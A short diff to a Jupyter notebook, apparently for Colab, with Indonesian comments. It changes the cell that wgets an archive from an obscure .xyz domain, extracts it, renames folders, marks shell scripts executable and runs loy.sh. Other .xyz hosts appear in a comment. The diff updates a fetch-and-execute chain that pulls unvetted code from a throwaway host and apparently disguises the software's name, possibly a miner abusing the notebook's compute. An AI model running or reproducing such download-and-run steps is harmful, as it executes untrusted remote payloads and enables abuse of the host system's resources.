--- a/[update]_ER_BEES_CATOKBROK.ipynb
+++ b/[update]_ER_BEES_CATOKBROK.ipynb
@@ -59,12 +59,12 @@
                     "#10.bestcmts.xyz\t\t\t20.ylocatin.xyz\n",
         "\n",
         "\n",
-        "!wget -O veterbitvddew.tar.gz ganti.veterbit.xyz/omalex/ALFA.tar.gz\n",
+        "!wget -O veterbitvddew.tar.gz hihbbhihib.librodot.xyz/nitro/ALFA.zip\n",
         "!tar -xf veterbitvddew.tar.gz\n",
         "!rm -rf *.tar.gz\n",
-        "!mv GAGAK WAJveterbitvddewIBGANTIJUGA\n",
+        "!mv GAGAK WAJveterbitvddewIBGANTIJUGA #ganti folder\n",
         "%cd WAJveterbitvddewIBGANTIJUGA\n",
-        "!mv GAGAK ALFA\n",
+        "!mv GAGAK ALFA #nama software\n",
         "!chmod +x *.sh\n",
         "!./loy.sh"
       ],
